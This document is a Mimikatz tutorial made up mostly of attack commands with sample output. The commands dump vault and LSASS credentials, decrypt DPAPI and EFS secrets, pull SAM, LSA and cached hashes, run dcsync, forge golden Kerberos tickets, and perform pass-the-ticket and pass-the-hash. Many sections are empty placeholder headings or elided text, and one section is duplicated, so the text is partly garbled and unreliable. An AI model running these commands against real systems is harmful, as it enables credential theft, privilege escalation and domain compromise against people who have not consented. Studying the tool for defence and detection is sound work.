Mimikatz Tutorial

Introduction

Mimikatz is a powerful post-exploitation tool authored by Benjamin DELPY. This guide presents its fundamental concepts, advanced usage, and real-world applications, helping cybersecurity professionals master credential extraction, memory manipulation, and privilege escalation on Windows systems.

The Standard Credential Extraction

The Standard Credential Extraction explanation

Basic Command Usage

To extract credentials using Mimikatz...

mimikatz # vault::cred

Example output:

[... contenu inchangé ...]

Explanation of Output

TargetName...
UserName...
Type...
Persist...
Flags...
Credential...

API description

Using Mimikatz to Extract Web Credentials

vault::list...

mimikatz # vault::list

Working with LSASS and DPAPI

LSASS description

Altering LSASS Logic

LSASS patch

mimikatz # sekurlsa::patch

Warning

Extracting Credentials with DPAPI

Intro

%appdata%\Microsoft\Credentials
      %localappdata%\Microsoft\Credentials

Example Command

Command explanation

mimikatz # dpapi::cred /in:"%appdata%\Microsoft\Credentials\85E671988F9AD21981A4B6791F9A4EE8"

Output description

**BLOB**
      dwVersion        : 00000001 - 1
      guidProvider     : {df9d8c0d-15e1-11d1-8c7a-00c04fc297eb}
      ...
      szDescription    : Données d’identification d’entreprise
      ...

Decrypting the Blob

Blob explanation

Master Key Location

Key location

%appdata%\Microsoft\Protect\\cc6eb538-28f1-4ab4-adf2-f5594e88f0b2

Extract key

mimikatz # dpapi::masterkey /in:"%appdata%\Microsoft\Protect\S-1-5-21-...\\cc6eb538-28f1-4ab4-adf2-f5594e88f0b2"

Using RPC for Domain Controllers

RPC explanation

mimikatz # dpapi::masterkey /in:"..." /rpc

Final Decryption

Final decrypt

mimikatz # dpapi::cred /in:"%appdata%\Microsoft\Credentials\85E671988F9AD21981A4B6791F9A4EE8"

Decrypted output

**CREDENTIAL**
      credFlags        : 00000030 = 48
      credSize         : 0000008e = 142
      ...
      UserName         : domusr
      CredentialBlob   : dompass

Decrypt EFS Files

Decrypting Encrypted File System (EFS) files can be complex...

Decryption Steps

Retrieve and export the certificate.
Locate and export the key.
Decrypt master key.
Decrypt the private key.
Access the file.

Prerequisites

Encrypted files on system.
d:\\Users\\<username>\\AppData\\Roaming\\Microsoft
Master key e.g. waza1234/

Get File Info

cipher command:

cipher /c "d:\\Users\\Gentil Kiwi\\Documents\\encrypted.txt"

Export the Certificate

mimikatz # crypto::system /file:"D:\\Users\\Gentil Kiwi\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\B53C6DE283..." /export

Locate Private Key

mimikatz # dpapi::capi /in:"D:\\Users\\Gentil Kiwi\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\...\\filename"

Decrypt Master Key

mimikatz # dpapi::masterkey /in:"D:\\...\\Protect\\...\\eccbd2c2..." /password:waza1234/

5. Decrypt the Private Key

mimikatz # dpapi::capi /masterkey:7e86f2b799... /in:"D:\\Users\\Gentil Kiwi\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-...\\filename"

6. Decrypt the EFS File

Scheduled Tasks Credentials

Step-by-Step Instructions

1. Vault Credentials Method

mimikatz # vault::cred

TargetName : LAB\\admin / <NULL>
      UserName   : LAB\\admin
      Type       : 1 - generic
      Persist    : 3 - enterprise
      Credential : waza1234/a

mimikatz # sekurlsa::credman

Authentication Id : 0 ; 183160 (00000000:0002cb78)
      Session           : Interactive from 1
      User Name         : Administrateur
      Domain            : LAB
      Logon Server      : DC-0
      Logon Time        : 03/01/2017 22:27:52
      SID               : S-1-5-21-...-500
          * Username : LAB\\admin
          * Domain   : LAB\\admin
          * Password : waza1234/a

2. Elevating to SYSTEM

mimikatz # privilege::debug
      mimikatz # token::elevate
      mimikatz # vault::cred

2. Elevating to SYSTEM

mimikatz # privilege::debug
      mimikatz # token::elevate
      mimikatz # vault::cred

TargetName : Domain:batch=TaskScheduler:Task:{813565C4-C976-4E78-A1CA-8BD4E749E965} / <NULL>
      UserName   : LAB\\admin
      Type       : 2 - domain_password
      Persist    : 2 - local_machine
      Flags      : 00000004
      Credential : 
      Attributes : 0

mimikatz # vault::cred /patch

TargetName : Domain:batch=TaskScheduler:Task:{813565C4-C976-4E78-A1CA-8BD4E749E965} / <NULL>
      UserName   : LAB\\admin
      Credential : waza1234/a

3. DPAPI Method

%systemroot%\\System32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Credentials

C:\\> dir /a
      %systemroot%\\System32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Credentials

mimikatz # dpapi::cred /in:\"%systemroot%\\System32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Credentials\\AA10EB8126AA20B83E9542B120AF904C\"

**CREDENTIAL**
      credFlags       : 00000030 = 48
      credSize        : 000000fe = 254
      Type            : 00000002 - 2 - domain_password
      UserName        : LAB\\admin
      CredentialBlob  : waza1234/a

4. Extracting DPAPI Master Keys

mimikatz # sekurlsa::dpapi

mimikatz # dpapi::cred /in:"%systemroot%\\System32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Credentials\\AA10EB8126AA20B83E9542B120AF904C"
      masterkey:049e924fc93420ed6d1e3731c24fc9fcb6dcdd258ac2106dc426dec3adc1200ee7abdd56c68cd05185f02d39ac2b2ca5158534ea5c53c2d6e73bbce

**CREDENTIAL**
      UserName        : LAB\\admin
      CredentialBlob  : waza1234/a

5. Offline Method

mimikatz # lsadump::secrets /system:c:\\backup\\SYSTEM /security:c:\\backup\\SECURITY

mimikatz # dpapi::masterkey /in:\"%systemroot%\\System32\\Microsoft\\Protect\\S-1-5-18\\User\\5d4e7ed0-d922-4783-8efc-9319b45b1c9a\" /system:c89e3964a40b5aa3b3993c8320822f857d9182c

mimikatz # dpapi::cred /in:\"%systemroot%\\System32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Credentials\\AA10EB8126AA20B83E9542B120AF904C\"

Crypto Module

It includes certutil-like functionality, token impersonation, patching APIs, and more.

Commands

providers

Usage

mimikatz # crypto::providers

Output Example

CryptoAPI providers :
       0. RSA_FULL (1) – Microsoft Base Cryptographic Provider v1.0
      ...
      CNG providers :
       0. Microsoft Key Protection Provider
      ...

capi

Microsoft Base Cryptographic Provider v1.0
Microsoft Enhanced Cryptographic Provider v1.0
Microsoft Enhanced RSA and AES Cryptographic Provider
Microsoft RSA Schannel Cryptographic Provider
Microsoft Strong Cryptographic Provider

Usage

mimikatz # crypto::capi

Output Example

Local CryptoAPI patched

cng

Usage

mimikatz # privilege::debug
      mimikatz # crypto::cng

Output Example

\"KeyIso\" service patched

kerberos

Commands Overview

ptt: Pass-The-Ticket
golden / silver: Créer des tickets TGT/TGS
list: Lister les tickets
tgt: Afficher les TGT actuels
purge: Supprimer tous les tickets de la session

Command Details

ptt (Pass-The-Ticket)

Arguments:

filename: The ticket’s file path
directory: A folder with .kirbi files

mimikatz # kerberos::ptt Administrateur@krbtgt-CHOCOLATE.LOCAL.kirbi

golden / silver

Common Arguments

/domain –
/sid –
/user –
/id –
/groups –

Key Arguments

/rc4 or /krbtgt:
/aes128:
/aes256:

Target & Service

/target:
/service:

Ticket Output

/ticket:
/ptt:

Lifetime Arguments

/startoffset:
/endin:
/renewmax:

Example:

mimikatz # kerberos::golden /user:utilisateur /domain:chocolate.local \\
      /sid:S-1-5-21-130452501-2365100805-3685010670 \\
      /krbtgt:318b643c5316c8c3c70a1c0ef17be231 /id:1107 /groups:513 \\
      /ticket:utilisateur.chocolate.kirbi

tgt

mimikatz # kerberos::tgt

list

/export –

mimikatz # kerberos::list /export

purge

mimikatz # kerberos::purge

lsadump

Commands

sam
secrets
cache
lsa
trust
backupkeys
rpdata
dcsync
netsync

sam (Online Mode)

mimikatz # lsadump::sam

Elevating Privileges

mimikatz # privilege::debug
      mimikatz # token::whoami
      mimikatz # token::elevate

Running Again

mimikatz # lsadump::sam

Output

Domain : VM-W7-ULT-X
      SysKey : 74c159e4488119a0ba39a7872e9d9a56
      SAMKey : e44ddd44f07ebfe800edf6c11d4abd
      
      RID : 000001f4 (500)
      User : Administrateur
      NTLM : 316dcf...c089c0
      ...

Offline Mode

reg save HKLM\\SYSTEM SystemBkup.hiv
      reg save HKLM\\SAM SamBkup.hiv

Or:

C:\\Windows\\System32\\config\\SYSTEM
C:\\Windows\\System32\\config\\SAM

mimikatz # lsadump::sam /system:SystemBkup.hiv /sam:SamBkup.hiv

secrets

mimikatz # lsadump::secrets

cache

mimikatz # lsadump::cache

lsa

mimikatz # lsadump::lsa /id:500

mimikatz # lsadump::lsa /inject /name:krbtgt

mimikatz # lsadump::lsa /patch

dcsync

mimikatz # lsadump::dcsync /domain:chocolate.local /user:Administrator

sekurlsa

Requirements

privilege::debug (admin)
SYSTEM via psexec, scheduled task, etc.

Initial Setup

mimikatz # privilege::debug
      mimikatz # log sekurlsa.log

Commands and Usage

mimikatz # sekurlsa::logonpasswords

Example output:

Username : Gentil Kiwi
      NTLM     : cc36cf7a8514893efccd332446158b1a
      ...
      kerberos : Password : waza1234/
      credman  : Password : anotherpassword

Pass-The-Hash

mimikatz # sekurlsa::pth /user:Administrateur /domain:chocolate.local /ntlm:cc36cf7a8514893efccd332446158b1a

tickets

mimikatz # sekurlsa::tickets /export

ekeys

mimikatz # sekurlsa::ekeys

dpapi

mimikatz # sekurlsa::dpapi

minidump

mimikatz # sekurlsa::minidump lsass.dmp

process: context switch
searchpasswords: find passwords
msv: MSV credentials
wdigest: WDigest credentials
kerberos: Kerberos credentials

mimikatz # sekurlsa::minidump lsass.dmp
      mimikatz # sekurlsa::logonpasswords